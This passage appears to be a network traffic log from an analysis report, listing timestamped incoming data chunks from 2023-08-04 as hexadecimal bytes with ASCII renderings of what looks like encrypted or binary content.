                                                                                      2023-08-04 16:48:38 UTC98INData Raw: 18 7c 09 b7 ba 64 b5 c5 03 ae 47 2a 34 5d c9 50 9e aa 7c 21 17 16 12 03 e2 42 4f bc 7f f8 f2 96 5d a7 02 c1 33 35 f2 3d 54 6a f8 92 d5 c0 50 10 32 99 b5 09 43 b9 d0 65 45 a3 d7 16 a3 33 4a 3d d8 fb c6 41 e1 e1 8d 40 8f 21 c6 87 cb bf 60 1f 32 30 dd 0d d7 bd e3 16 7b fd 97 5b ab be d3 0e 7e be 5a 91 f9 83 6d 6e 55 8f 54 0b 31 5e 33 14 56 66 59 97 7f 98 9e 4a 80 4b 68 0e bb 5b 26 96 54 04 4e 26 7f ae 9d 60 ad 65 ca d4 8c cc ff a1 cd ba 44 f7 03 56 6d 16 93 46 7e 88 5f 1b c2 50 57 85 fe be 70 1d cf 0c 47 7e ab d9 ed 88 1b 3c 99 3f 8a 4e aa bf 6d 79 88 7f ef 2f 6c 6d 22 59 d6 95 02 74 68 39 00 3d e2 64 c2 65 a4 61 e3 9f 43 fb b6 70 df 38 fd 97 07 67 a1 e7 78 ad 03 79 ad ec ef 32 bc 34 69 95 59 b5 ce cf 13 d5 63 7d 74 fa f8 fc 3c de 19 fd e0 f5 a3 42 d1 f8 fa
                                                                                      Data Ascii: |dG*4]P|!BO]35=TjP2CeE3J=A@!`20{[~ZmnUT1^3VfYJKh[&TN&`eDVmF~_PWpG~<?Nmy/lm"Yth9=deaCp8gxy24iYc}t<B
                                                                                      2023-08-04 16:48:38 UTC102INData Raw: 90 b5 62 03 1d a3 a8 22 35 fd 21 ba 24 0a 5b e3 8a 57 4b 94 7e f6 4a 3c 1c c0 26 c3 d0 66 f8 38 97 f3 7f 55 59 af 32 4c 55 f4 ff 64 e8 6e c9 ac 26 2c 37 3c 27 6a a2 ea d2 8e e7 29 01 6a 82 ab 8c 7a 7a ff 5c 0e af b3 5b 6a 3f 6f fe a8 d2 b6 68 09 19 17 b0 2d 1d 81 83 83 2b 22 b9 9d 98 ab 76 f0 4b c9 b7 b1 5c 83 1c ab 1d df f2 c3 b3 91 8d 3a 8d 69 24 af 97 24 9d 42 34 09 3a d9 04 7f 18 d8 f7 de f3 a5 44 4c 7b 53 fa 1b 67 c1 93 56 ad 2f 98 67 4e 44 bf 88 0a d9 76 4c d8 6d 6d aa ac 1d d0 55 b1 7d de e7 fc 4e d5 1a 2c 41 a9 48 83 e9 1e 5d 2f e8 7e 9d fc a1 2a 9d d6 8e a4 0e 3e cd 48 5e e6 e3 32 49 2e 92 fc d4 00 cc c1 ab d5 8c cd ea 53 d6 a9 4f 01 e9 d0 25 63 ad a2 41 86 51 4f 2e ac 04 c8 83 fd a5 cf 25 76 f0 70 f9 68 a9 ba 08 dc 99 0e 97 cc 1e f5 6c e9 7e b0
                                                                                      Data Ascii: b"5!$[WK~J<&f8UY2LUdn&,7<'j)jzz\[j?oh-+"vK\:i$$B4:DL{SgV/gNDvLmmU}N,AH]/~*>H^2I.SO%cAQO.%vphl~
                                                                                      2023-08-04 16:48:38 UTC106INData Raw: 13 2d f6 af 43 60 75 76 61 6b d9 d0 5f a4 a6 fe 9a 93 89 ba c0 73 7d 02 19 b3 1d a3 cb 25 07 04 08 f6 2d d6 d9 de 00 0e 51 d6 bc 7a 8f d3 8d b6 0c f9 00 7f a5 e5 56 70 55 79 5c 05 df 0b 76 8a 53 92 08 05 f0 96 af 7f 6d 55 cb 9a 9c 43 97 28 7a e0 8f 91 62 22 50 75 fb 3d b6 56 8c 51 ed ac 7b 5f b8 4b 51 ce 2e 92 45 33 2a 8f 1a 2c f7 7e fd a0 6e 45 2a d8 1a 2d 26 bb fc 4f 34 88 23 ea c9 8e f2 d1 f6 15 bf ce 61 92 24 bb 29 bb 95 c7 c5 4a 3f a2 db ef 19 3c 68 dc df c9 fb 69 4f c7 6f 73 74 2f 1c 9c 72 bc 68 d7 93 e6 12 21 60 4c bd 74 42 c1 e6 6e 00 ad d8 7c eb 24 cd d3 e0 f5 48 06 ae 26 1d 26 2d 67 b9 81 b7 83 18 ce bc 2d 99 3f a0 1d 56 4d 26 dc de 2d a3 08 59 08 0c 6f dd 99 29 e9 9e 7e 53 eb 67 e2 a6 8f 1e 30 21 3e 78 a6 13 9c 75 73 47 52 79 5b c5 45 b7 f5 b0
                                                                                      Data Ascii: -C`uvak_s}%-QzVpUy\vSmUC(zb"Pu=VQ{_KQ.E3*,~nE*-&O4#a$)J?<hiOost/rh!`LtBn|$H&&-g-?VM&-Yo)~Sg0!>xusGRy[E
                                                                                      2023-08-04 16:48:38 UTC110INData Raw: 05 bd f1 a7 81 f5 10 1a 90 17 5b 1e bb 95 71 e8 a4 3b 65 40 90 5b c3 b0 40 16 03 61 e0 5d bd ef bb 80 aa 5d 01 da c8 d9 f3 7f 8b 08 67 b8 98 85 f7 4c 61 5b ac f2 70 a4 76 fa 0c bc a6 d3 51 bc 46 7e cf ef 95 84 26 b3 8d f7 d5 1a 70 00 89 db d4 a9 a1 d1 3a 88 ba 89 ac 6a 25 e9 5e 0e 9e 8f 31 97 2b db 27 9b c0 5f 81 f0 09 49 34 0f 30 1e 36 fc a3 3a b4 aa 25 46 6b 2e 4b d6 97 c6 0f 8b 3a 7f 5e 78 2b 5d d5 62 f7 14 79 9d bb ad ee 16 ff 93 90 6c b3 5d 5a 6a 2d 61 f0 05 ef a7 9d 4d ac 16 b0 69 09 95 a4 3a c5 12 c5 9a db c5 4b af 51 59 b5 ac 2a 25 d9 11 73 a3 cf 98 7c 13 65 a9 4e 8d 7d ec 86 df 5d 85 e6 03 ce 28 78 1c a4 0f bf 67 cc c8 e5 e5 0c cd b9 c8 7a 39 06 ef e4 6e 79 01 3c 37 39 c9 cb ce e7 01 f3 1e 36 07 94 dd a7 12 a3 87 ab 2a ab a6 95 c6 33 6e 50 2b 9e
                                                                                      Data Ascii: [q;e@[@a]]gLa[pvQF~&p:j%^1+'_I406:%Fk.K:^x+]byl]Zj-aMi:KQY*%s|eN}](xgz9ny<796*3nP+
                                                                                      2023-08-04 16:48:38 UTC114INData Raw: aa 5d a8 8f 13 97 c6 7d 92 64 f0 23 c9 8f 42 d6 24 ef bd ec 3b e9 25 aa 35 79 13 81 45 54 89 d0 04 e0 f8 c5 ff 8d e6 08 07 c2 ab d8 2a d1 dd 22 0f e1 70 57 79 22 8a a0 1c 49 5c 2b d9 55 2f 95 57 9b 4a 94 e7 96 5a f4 68 31 01 71 03 64 d7 ae 22 7d fa 94 ae 80 cc df 11 42 55 87 2f 57 6e d2 7e 9b 7c f2 91 74 68 ee 75 9c 97 db 2c f0 12 0b a5 35 a2 ba b2 21 50 fe 15 57 5a e8 2b 25 32 01 e2 13 51 6f 14 8e 6c e2 a3 0d 0c b2 96 6b 5b 23 0c 00 b6 d4 3b 47 69 a3 f8 5e 70 d0 1e 24 26 a7 26 71 91 a6 2c 9b e9 24 17 2e 5e e8 f4 2e a7 cd f6 fa 4e 7c 71 e1 d6 3c 27 15 49 24 e6 95 29 05 69 18 ef 89 77 22 55 ba 2a ce 4f d4 3d 54 25 8d 02 c6 d3 52 d2 a5 a6 27 5b c1 10 6d 8e 36 78 d5 40 ed 2c c9 99 2a 32 e3 14 2d ac e2 12 5a 24 46 79 70 d8 73 ed ed bc 5a 5c de 55 38 47 8b 44
                                                                                      Data Ascii: ]}d#B$;%5yET*"pWy"I\+U/WJZh1qd"}BU/Wn~|thu,5!PWZ+%2Qolk[#;Gi^p$&&q,$.^.N|q<'I$)iw"U*O=T%R'[m6x@,*2-Z$FypsZ\U8GD
                                                                                      2023-08-04 16:48:38 UTC118INData Raw: 75 dd d7 01 94 70 56 a6 f1 8b ad 92 49 35 9e 8f 18 59 f1 2e e7 96 84 4e ae 69 75 73 4a 0a 57 ef 2f 38 08 e3 38 b8 a4 cc c2 49 9a fc 98 9e 36 c2 35 6a 9c 82 43 17 38 11 d9 d9 7b eb 92 b2 9a d2 16 13 7d f7 cf 49 19 59 39 a8 fa 52 00 14 9a 19 ea 6a 1b 76 24 57 bf aa 9e 65 b6 7a 36 36 51 2e bd 4a 7a 3c 96 ea 5c 97 7a 55 51 89 35 c5 f5 b6 31 4a 02 61 0a 81 3c 8a 64 8c 45 73 99 05 6a 7d 6b e2 6e 29 f4 8c d5 10 9b 04 03 5c 06 54 08 4e 15 f1 2d 14 f9 d1 ca f5 18 34 98 4d e0 49 9e 01 63 7e bc e3 ae 48 6d ec a5 26 e1 16 46 b1 08 d5 ad f4 68 c5 4d 50 80 59 12 34 91 c2 91 90 e9 d2 28 ce 4c df b1 e5 7b ce d9 3b 1f de 26 cf 1c 47 41 41 93 7a d5 a5 3e b4 b1 9c 64 78 a7 3d a9 45 f6 84 e6 23 ca d8 64 61 41 8e 09 c5 b4 d7 ce c6 12 98 dc 04 da 02 85 d7 09 c2 2b d3 45 6a 0d
                                                                                      Data Ascii: upVI5Y.NiusJW/88I65jC8{}IY9Rjv$Wez66Q.Jz<\zUQ51Ja<dEsj}kn)\TN-4MIc~Hm&FhMPY4(L{;&GAAz>dx=E#daA+Ej
                                                                                      2023-08-04 16:48:38 UTC122INData Raw: 4c 94 f9 42 fb ff 4c ca 50 ed 37 a0 79 ab e3 6b ec ad 64 e4 35 cd 37 76 52 2a 1c 52 8d f3 5c ef f4 78 41 75 17 76 18 30 ff 1d 36 9e 62 8b 75 e9 af 73 d2 32 0b af 96 a4 73 d2 16 fb 03 12 cc 17 c8 eb 6a bb 25 06 1c 65 6d 30 2a 8e 39 e8 be 15 66 cd 3d 18 e1 c6 4e e4 f4 0d 25 0e 53 33 a6 e6 93 b8 89 ba ce df 4c b5 c0 85 ca 4d 06 89 a6 d0 22 3e 94 dd 9d 05 85 c3 a7 3c f4 96 b4 b3 cb 6e 2f be 33 97 71 77 28 e6 cd 7d 07 33 6b 29 a7 bd 77 47 19 1c ae c9 b3 bc 11 63 df 2b 24 f5 a7 3d 2d e7 9c f7 a0 b7 67 d5 5f 91 b0 07 67 8f 53 83 8d b1 60 9d 64 1e a1 5e a5 cc 35 fd 39 0d 06 a8 ee 8d 0b 6b 52 e4 d0 bb c3 3a 09 68 59 35 05 47 91 e1 80 f1 03 62 5f bb be 82 b9 2a a9 8a aa 36 a2 96 da fa cb 47 dc 48 b0 7a c9 4c d2 82 6e fd 43 6e 4c 23 c8 9f 73 aa a0 1e 50 c3 a2 9b 33
                                                                                      Data Ascii: LBLP7ykd57vR*R\xAuv06bus2sj%em0*9f=N%S3LM"><n/3qw(}3k)wGc+$=-g_gS`d^59kR:hY5Gb_*6GHzLnCnL#sP3
                                                                                      2023-08-04 16:48:38 UTC126INData Raw: 04 08 43 57 01 6b 7c d6 dd 81 bb 0b 02 59 b7 76 c7 65 0e e8 05 e6 6a 9c 3f 37 35 b3 e3 c8 63 fd c1 14 1a f8 c7 f7 f3 d0 29 e7 47 eb 0a 07 0f 9d 8c 25 de 6e 73 6b 94 28 ef 65 23 09 0a 7a 2a ce 25 03 b0 f2 ac b8 79 b9 30 d5 9d a1 b8 cd bc 2a b7 de cc 03 09 a0 10 5c 65 bc 65 9e c2 eb f2 1b db 4a 4f 45 54 e6 d9 bb 48 a8 ab 1c 15 ed 18 ac 20 0d 81 19 17 9e 9a b5 27 b6 05 c0 99 0f 18 26 86 63 60 0a 72 4c b2 5a c1 fd 98 66 71 cb f3 07 a5 8d 19 90 48 3c 35 70 65 51 6f 83 a4 1a 42 3f f5 fd 84 0d d5 65 91 05 98 f9 ff 88 9f e6 7e 6e 3d 93 a7 a5 dd ed 93 90 23 6e 14 bd ff c8 99 30 ba db f0 fa 8a 77 c4 1c 18 96 92 fa d5 c2 39 27 16 a7 10 18 22 08 56 a5 2f 31 d2 ff a5 18 fc fd d0 c8 d5 3b 02 92 d7 ae 30 0d ca af 5e 57 ea 9f 34 58 a8 c4 3e 57 93 21 46 27 f0 fb ee 5a 99
                                                                                      Data Ascii: CWk|Yvej?75c)G%nsk(e#z*%y0*\eeJOETH '&c`rLZfqH<5peQoB?e~n=#n0w9'"V/1;0^W4X>W!F'Z
                                                                                      2023-08-04 16:48:38 UTC130INData Raw: c7 6f 3f 37 b6 32 11 c8 80 90 f7 6e 00 b0 62 58 e2 6f 16 19 77 3c 7a ef 4a 9f cd b2 60 d2 ec f0 5c c1 9f 41 0f d8 55 4b 42 ab fd e7 8b 1d 13 81 1b bb bd c6 9f e5 a7 a0 28 cf 1c af 84 32 df 64 e5 b6 85 de 4b e8 fc 64 b1 98 90 0e 37 7a 1c 6f 7d 43 ae 21 eb 69 d5 ea 2f 92 b1 0e 9d 40 25 65 f9 f9 6c 0f 3f 2d 59 fb 4a 5e ef 01 65 27 7e 94 3c 17 bd 1d 7e 56 e0 44 30 02 47 b1 af ac bd a0 b0 d2 47 7e 00 85 c9 e6 15 61 b9 74 0a 9c 81 f0 0a 48 eb 39 8c 72 93 03 9c 9d a5 a9 4e 90 01 99 2d 91 3e 54 61 27 99 10 08 49 a0 95 ac 48 71 85 d9 9f 5f 51 b4 fe c5 4f 11 3a 25 9f 31 de f1 51 1f 4d 6f 6a e4 3c bf 51 64 df f9 49 8f 08 d1 9c 26 37 4a 76 91 8c a1 17 47 75 fe 0b 84 03 f2 99 e1 d6 72 24 33 cb c3 fa e8 07 09 4d 50 55 bb 88 4f a3 f2 15 7a 30 3d 65 84 f7 cd c4 c5 93 b9
                                                                                      Data Ascii: o?72nbXow<zJ`\AUKB(2dKd7zo}C!i/@%el?-YJ^e'~<~VD0GG~atH9rN->Ta'IHq_QO:%1QMoj<QdI&7JvGur$3MPUOz0=e
                                                                                      2023-08-04 16:48:38 UTC134INData Raw: 5e 2c 4c cd 0d d2 ef 39 3c bd e1 f2 4b 82 02 3a e7 3b 12 7a 37 c0 bb a3 d9 62 08 8c 87 eb 92 18 b1 0a f7 33 58 58 0e 89 6d 13 8d 08 68 6f 81 c8 bb ba 29 22 63 f0 06 c3 5e 33 0d fe 02 21 ca 33 68 a3 3c fd 4e 2f 18 be 7b 77 cd 4e 08 32 41 d4 9b 3d b0 f4 a0 bb 6f 7c 9d bf 53 15 96 43 e6 a2 b4 81 5e a5 08 fd ea 18 6d 27 a8 39 c0 7f cf ba 8e a9 44 09 ed 22 c6 e0 a9 94 46 13 45 6f f1 ab f2 44 93 ae f2 27 dd 1c 19 9a 25 c7 6f d7 19 69 3c 5d 59 6d 0f 76 6d 51 d5 df d2 90 50 40 4a 2e 90 a7 a0 2c 42 dd 92 c3 32 26 79 b0 af e2 9a 9b 2d 87 b9 1d bd 52 95 31 e6 c2 4c e8 c5 5e 52 da 19 54 11 9d d9 dc c4 17 0e e5 97 d2 05 49 3a f0 b3 2f 02 a5 24 31 ca 50 9b 00 97 fb b5 44 43 b4 6e d9 f7 11 f0 8e f8 98 6f 94 5b 62 a4 9e 7c 2b c1 74 2a e4 1b e7 83 92 47 a6 73 c3 58 02 aa
                                                                                      Data Ascii: ^,L9<K:;z7b3XXmho)"c^3!3h<N/{wN2A=o|SC^m'9D"FEoD'%oi<]YmvmQP@J.,B2&y-R1L^RTI:/$1PDCno[b|+t*GsX
                                                                                      2023-08-04 16:48:38 UTC138INData Raw: 40 88 ea 78 59 6e 3c 66 3f 7d 85 48 fb 2b 58 5b 5a 2d 34 1d 12 c6 2f 70 17 7a 6e db 1a 24 26 b6 29 e2 fb 66 fa 60 f5 7c 58 2b da a8 52 fb a4 b1 3e 72 92 50 e8 03 00 85 72 d3 9c f7 e4 b3 f9 3d f4 01 5c 4c 35 2b 30 b3 87 41 1e 24 72 fc 07 0d e9 bc f6 91 0a f1 47 18 af 7a 3d 9b 2d 22 ae ec c1 d3 15 55 22 51 25 f0 1e e3 62 4d 39 2f bd 4f 74 c4 98 81 01 1f be 0f 05 df d2 4c 30 25 39 e0 b4 6f d7 37 cc 94 cf 2a 5f 87 a4 c7 0c 73 fb 58 c8 61 04 f6 b1 65 bb e3 92 11 be 8a 9f 71 b4 75 c1 eb 5d 07 90 57 d2 ec 37 8d 64 17 f6 e3 99 33 d6 a1 ce b2 71 69 d4 69 2c df 33 8f 44 84 9f 35 aa cb 4a 34 53 1b 53 f6 1a d5 2f 2c ab 76 25 6d 71 3c 7e 8e 76 b0 87 f6 a9 61 fd 72 50 bb 4b c2 ca bf 6d 2f a3 e6 04 f9 61 bd 27 06 40 3c bd 9b f4 b6 d4 b5 e0 d2 95 7c db ab df d3 17 f3 80
                                                                                      Data Ascii: @xYn<f?}H+X[Z-4/pzn$&)f`|X+R>rPr=\L5+0A$rGz=-"U"Q%bM9/OtL0%9o7*_sXaequ]W7d3qii,3D5J4SS/,v%mq<~varPKm/a'@<|
                                                                                      2023-08-04 16:48:38 UTC142INData Raw: d2 3c 4f b7 f5 f5 79 c0 78 af 4d d3 e1 94 27 2d 20 59 18 fd 71 2c 31 bb 45 f0 c9 eb ce 32 33 47 5b 14 db e4 09 1d b7 7b 58 7a 06 62 53 3a af fc d9 34 14 ce 44 7c 87 41 93 3b 08 97 62 93 36 ae d5 b6 fa 3b aa c5 77 54 6c f8 39 b5 78 99 a1 f6 72 2d 1c e8 06 8d aa 5e 25 44 87 44 e8 13 ce 42 3f 8d 69 cf 3a b8 ca 49 a2 c9 c0 ca eb 5b c2 5b 11 c8 49 8e 06 98 3f ea a2 f1 7e 51 77 f1 18 bc 25 d1 d5 cb 0e 5f 4f b2 be ae 19 d5 12 ab 4e 3b 30 a5 ce 69 75 98 8b 79 8f e2 09 09 14 b3 4b 84 65 3a b4 93 8a 91 94 0a 72 39 d6 71 98 b0 f9 8f 8b 00 8b 03 a5 17 e5 a5 0c b9 ef d6 51 67 da 19 6a 2b 55 ed a5 39 18 86 c3 a4 c9 6c 6b 52 0a 4e d6 df 3e 60 df c3 93 58 5c 33 12 2f 5a 33 20 56 4c 73 fc cf 64 b3 1d 6b c1 42 a6 dd 2c ed 00 49 76 01 b0 d8 77 39 c2 0d 3d 6e 83 94 5f b3 83
                                                                                      Data Ascii: <OyxM'- Yq,1E23G[{XzbS:4D|A;b6;wTl9xr-^%DDB?i:I[[I?~Qw%_ON;0iuyKe:r9qQgj+U9lkRN>`X\3/Z3 VLsdkB,Ivw9=n_
                                                                                      2023-08-04 16:48:38 UTC146INData Raw: 36 b7 a0 80 89 2f 2b 27 a2 db a6 45 ff 63 25 9c 45 c6 39 ac 94 c6 f5 c4 6a b4 36 43 c4 ab 2f 19 67 95 7c 78 3b ce c1 e5 06 5f 8c 66 b1 7f 3a 24 7d 3a c5 f3 1b 9e ee 36 c4 6e 36 11 e1 be 3e a7 9e cb b7 92 59 72 48 c0 f7 76 a7 37 93 4e 66 3a 07 62 57 0f 32 71 7d 07 59 58 a3 b6 9c a7 8e 56 85 da 76 b9 bd f7 85 67 55 84 e3 46 36 a0 f6 8f b1 24 9c 2b 1c 6e 2d 37 15 1c fb 78 56 94 fa ee 00 0d 1e 1a 44 be 67 73 c3 86 d2 c4 a7 0b 27 60 29 11 71 1e 4d e1 c9 8e 46 dd fb 56 f9 3d 02 af 29 dd 5c 90 35 af eb ef 49 cb 1c c3 1d 5a c5 f8 ef 9e c6 4d cc 46 ab b1 64 b2 4f 85 d7 cb 79 43 25 bd 1b d5 6b 55 ed 22 ca fc 99 4b 7a 62 79 8d af 8f 17 ca d3 4f b1 f1 14 e3 ec 77 64 ed d4 bf 3c f0 45 3e fc 41 48 98 54 cd 4e 03 b1 9e 6c e2 b6 ea d0 49 92 21 8a be 7f b1 57 87 bd 53 47
                                                                                      Data Ascii: 6/+'Ec%E9j6C/g|x;_f:$}:6n6>YrHv7Nf:bW2q}YXVvgUF6$+n-7xVDgs'`)qMFV=)\5IZMFdOyC%kU"KzbyOwd<E>AHTNlI!WSG
                                                                                      2023-08-04 16:48:38 UTC150INData Raw: f1 97 03 10 23 2e c2 fe 99 ec ad 60 87 84 85 b4 a2 9c da 8a f2 cd e9 4e 33 1f fe 45 d2 9b 83 61 5c c7 9f fe 42 e9 22 db 3e d4 99 e6 46 1e 27 7c df 81 f4 2b 13 28 79 82 7e cc ef 91 20 3d da 37 6a 2f f2 cb 88 64 6c 7e 8c ef bb c7 49 21 44 98 1a 28 d1 13 7d 6b 40 17 33 de 4b 7a 6f bc 62 bf 0e 81 79 ba ca 02 18 cf a7 45 73 6b 53 d9 77 06 7f 34 d3 09 4a 5d 90 84 1a 2f 4b 87 f4 74 d1 b9 8d 4d 4b da 32 3b af 23 f6 dd bf 43 18 c8 7e e2 cb d8 39 c7 25 bc 80 12 5e 43 d8 c2 17 d2 d1 c9 7b b9 90 38 fa 46 d9 82 12 07 2d 69 03 b1 08 c5 29 8e fb 93 d3 9a ee 0b ed 67 23 48 a6 27 34 56 72 c9 56 f7 0c 58 8e 60 85 58 e5 c4 5f a2 93 a5 9f 59 a6 3f 6a a8 63 a6 27 20 b6 1a 22 e7 ae 3b 02 f6 c9 ee bc a8 51 26 e9 38 78 b4 7b 6d 3d dc 04 1a 0e a2 e1 1c c5 67 6b 6b 38 71 49 bb 67
                                                                                      Data Ascii: #.`N3Ea\B">F'|+(y~ =7j/dl~I!D(}k@3KzobyEskSw4J]/KtMK2;#C~9%^C{8F-i)g#H'4VrVX`X_Y?jc' ";Q&8x{m=gkk8qIg
                                                                                      2023-08-04 16:48:38 UTC154INData Raw: 29 ec 50 5c 15 e1 00 33 b4 98 f0 eb 14 7d 64 99 60 a4 0b 8e 2b ac b9 04 66 41 77 d6 04 df 54 b0 bf 09 3d cc a1 2c 42 ac 9c 9d 97 16 70 01 9d 81 71 79 8a 47 f7 f0 1a 27 3f e0 f2 33 0d 7c d6 41 2f 9f 2d 53 b8 a6 d8 ce 3c 22 28 18 1d 36 59 2d 64 6a 74 1c e8 78 f9 c2 65 78 00 de 1f 40 ae f3 eb aa 39 bb 8b 2d 98 39 97 03 80 b7 4f 58 4d 11 6e 5d 95 e7 c1 3e 89 24 a7 c1 ad 19 e0 96 62 f1 17 f5 83 a1 25 39 df fa 41 45 35 c1 87 2f fc 20 3e 25 c0 a3 cd b3 57 39 51 51 1b af e5 55 91 2f 6d 7d ea fb 9c 41 ee aa be 84 26 7e 32 56 52 e8 9d a3 d6 0b cc d1 8c 65 85 ca 8c 2c 2a 8a 14 3f da 85 57 b0 55 14 d2 0e b5 df b1 99 d8 03 fd 63 fb f2 cb 2b de 76 65 ea 78 38 bb 38 db dc 8c b4 db f8 3a 5f f8 58 7e 49 e6 d6 00 31 ef a0 f1 f7 c5 f3 30 0d 03 d2 dc 8b a1 68 6a 1a 48 74 2a
                                                                                      Data Ascii: )P\3}d`+fAwT=,BpqyG'?3|A/-S<"(6Y-djtxex@9-9OXMn]>$b%9AE5/ >%W9QQU/m}A&~2VRe,*?WUc+vex88:_X~I10hjHt*
                                                                                      2023-08-04 16:48:38 UTC158INData Raw: b5 d0 f3 0e dd 85 a6 89 b1 ca 48 04 84 48 7f 2c ab ec b8 72 17 a5 7a 9a 9f 9a c7 de cd 51 7c fe 92 09 cd 59 96 ff ef 18 e5 68 0b ce ca f5 65 26 4a b0 9c 7b 02 0b ed be 34 29 ff d4 5e 1c 48 f9 ac ae fa e8 9e 0f a7 64 8e 56 fa e7 8e 35 47 c3 5a ab 27 72 b6 37 ff da ae 10 7e 8e 12 58 fb 99 46 34 29 3b 5a 8d 99 e0 2a 46 ea 67 d1 ab f0 b7 d6 c6 5a 3b ba 36 b2 4e 71 c3 e3 8c bb 02 89 81 1b 18 29 03 a3 77 7d c5 07 75 c6 9e d8 ef a8 10 46 bf 46 4d 61 f3 bc a9 5b 70 f1 49 fe 10 cb e0 67 05 ef 9f a0 e9 03 d3 34 39 23 36 5e df 5c e2 33 7a 59 b3 57 f2 f9 97 2f 30 9b 6f 58 08 5b 1f cd 2d a3 cb 9a e8 40 72 7f db a6 33 a0 d5 e5 a7 43 e6 ff 1b 1a 18 6f 3b c1 ef 4c ad a5 c9 c3 92 aa e1 f7 fa 99 95 e5 74 c6 36 e9 2a 09 4a 8f a5 d9 aa 8a f2 4e 45 3a 53 9c d5 fd 1e 56 ee d1
                                                                                      Data Ascii: HH,rzQ|Yhe&J{4)^HdV5GZ'r7~XF4);Z*FgZ;6Nq)w}uFFMa[pIg49#6^\3zYW/0oX[-@r3Co;Lt6*JNE:SV
                                                                                      2023-08-04 16:48:38 UTC162INData Raw: 65 9b ed a0 e6 7a 44 f8 2e 89 3a 1c 7d 68 60 45 ee 1d d5 0d 45 74 d5 4c 4f 10 ac a9 1a bb 6c a0 d0 a5 f0 e3 66 1c 93 67 99 bf fc 1c 94 5d d2 20 35 15 4c e1 bc 98 bd 4d 83 d4 f6 3c 3a 63 1a b2 7a bc 48 c3 7e 53 ff 53 2e 6d 6f 9b 54 e9 65 26 3b 06 71 2c 77 3e c0 35 f8 a4 9e ab 00 ca db 63 44 ee 06 74 a3 58 29 e8 1e 4d 14 85 cb 6f 8f 4c 92 51 90 75 6a 6d 5f 05 92 2a 24 15 84 a2 6e 84 d3 1a 14 b6 61 c3 8b 7d cc ca 3e 7c aa a0 16 b0 0f 7e 38 4e f7 65 cd 8b d8 25 a0 6d a6 36 fb 03 26 32 e4 54 d0 70 5f bc 6c 4b b4 1f d9 eb d4 51 50 db fb bb 9c 2d ba 2e 07 b8 50 4a 00 16 10 77 c0 89 34 86 ea b2 3e ae 35 2d 75 38 aa 63 6e c6 68 eb ad 58 11 6b bc 13 bf 8a d3 c2 8e 98 d7 7a 4e 01 87 1e 6c a5 64 63 f9 42 85 7f 35 2f e1 41 5c e9 ed 79 c9 37 6f 2a f7 3f 2a 53 46 74 94
                                                                                      Data Ascii: ezD.:}h`EEtLOlfg] 5LM<:czH~SS.moTe&;q,w>5cDtX)MoLQujm_*$na}>|~8Ne%m6&2Tp_lKQP-.PJw4>5-u8cnhXkzNldcB5/A\y7o*?*SFt
                                                                                      2023-08-04 16:48:38 UTC166INData Raw: bc ff c3 02 5f d3 49 c5 3b fb 51 07 f2 c5 b5 46 96 ab 53 4b 96 72 a4 a6 85 0b 71 62 6a 27 ae 87 84 78 8c 19 6f dc 48 05 8c 33 88 78 b3 f0 c7 63 5a 8f 05 4c 2d a7 13 e7 c6 39 27 ed 00 e7 76 0a 26 0a 00 ae d5 64 83 06 bd 36 e7 c5 17 f4 87 3c 74 c8 9b d3 89 4b d7 fc dc 21 e9 da 05 2d a1 07 26 ff a5 3e d8 27 af d0 6e 0c 81 81 32 14 30 6d 06 2d 78 ff 59 91 77 49 dd ae da 88 8d 25 7a 97 b1 90 d5 1b 17 41 85 cf 64 91 0c 28 94 27 dc 2c 51 70 99 69 b4 9c 50 5a fa 85 a7 bd d9 d8 b3 06 b0 d4 bd bb 4b f1 c5 fe a5 8c 61 fb d8 d0 e7 3c 6a ca 10 44 53 62 1e 21 53 a4 6e 77 60 84 fd ed df e3 35 ef 4e 67 10 d7 24 8f 7b 9f 90 c3 39 c9 7e f8 76 5d 76 57 76 d8 29 c8 9b 96 8b 35 b5 a3 9b ca 75 41 4a d4 8c 4c 1e 07 68 10 e6 e9 03 fe 4e 97 6b 2f 06 6a 90 7b bc 76 21 e1 fa b7 88
                                                                                      Data Ascii: _I;QFSKrqbj'xoH3xcZL-9'v&d6<tK!-&>'n20m-xYwI%zAd(',QpiPZKa<jDSb!Snw`5Ng${9~v]vWv)5uAJLhNk/j{v!
                                                                                      2023-08-04 16:48:38 UTC170INData Raw: a8 60 c7 b9 36 0a b7 57 1f 52 fc b7 76 2d e1 50 06 fd 7c a9 fc f2 33 a4 b8 ad e7 16 a7 57 df 75 4e 52 87 2f 7f 5d b5 2c 8d 07 68 f5 e5 95 3f cd 13 e6 8e ed 74 f6 1f 26 6d 3c 89 d9 61 98 49 19 3a 92 6c 8e ae 7c 6a e5 b2 e6 d8 dd 59 72 52 50 a6 64 1f bf 3d 4a e2 99 7e 1f 06 92 42 f1 c5 fa f4 8a ab 88 50 8b 7e 2d 5b fe c6 f2 e6 86 6c 25 25 59 f0 3e 3b b2 6c 1a 37 3f de 41 3e 02 bb 2f 88 0d c2 73 87 4f 22 0a 4b 96 6c 73 f9 f7 c4 0b f4 0d 7f 00 b2 23 f1 3c 87 73 92 29 ec 84 9c ff ca 2e cd 5a a5 84 63 f5 d2 94 eb e2 cd cf 0f 0b a1 fa 01 9f e2 47 0a c8 94 31 a2 c2 5c 77 1f fa 7a 0c ec 2c 05 6e cb d8 2e 20 ca 74 81 c0 0e a1 24 c0 95 74 3a 0f 85 88 72 de a2 b1 07 57 26 c3 f6 cd a7 20 e0 d9 e5 87 bf 1a 7c 7e 18 96 33 5e 1b 2b a2 ea c8 97 52 96 a6 89 1f 58 14 e0 83
                                                                                      Data Ascii: `6WRv-P|3WuNR/],h?t&m<aI:l|jYrRPd=J~BP~-[l%%Y>;l7?A>/sO"Kls#<s).ZcG1\wz,n. t$t:rW& |~3^+RX
                                                                                      2023-08-04 16:48:38 UTC174INData Raw: f6 98 4b 87 78 cd 6b 89 d8 5c f9 c9 51 73 5a 6f 6c e8 1f 04 f8 d8 00 b1 a7 15 1e bd ec a5 33 29 59 0f c4 d1 3b d9 5f 5b b5 37 3a eb 50 73 d9 a2 e8 df f5 39 77 ac d4 d0 f5 66 c2 d6 f7 55 69 d5 6e 22 94 85 03 42 3c d0 3a 40 82 08 ed a6 0d 5b bf 72 f1 9e da 16 72 0b 3b dd f4 9c f8 fb f3 86 a7 55 e2 8d e4 64 51 57 0f f8 ce 75 ba 83 b5 93 23 17 c7 bf 64 ca 88 cc 95 8d f7 e3 c7 b4 a5 dd 26 b7 7c cd 8e 2a 1c 29 3b e8 01 e8 72 2c 1f e9 6d 2d 1c 89 29 c3 43 c2 02 ac 9b c7 30 8f 65 10 0e 90 ad a6 36 64 37 08 a5 b4 7b b9 cb e5 b2 fc e6 e1 49 a0 90 c8 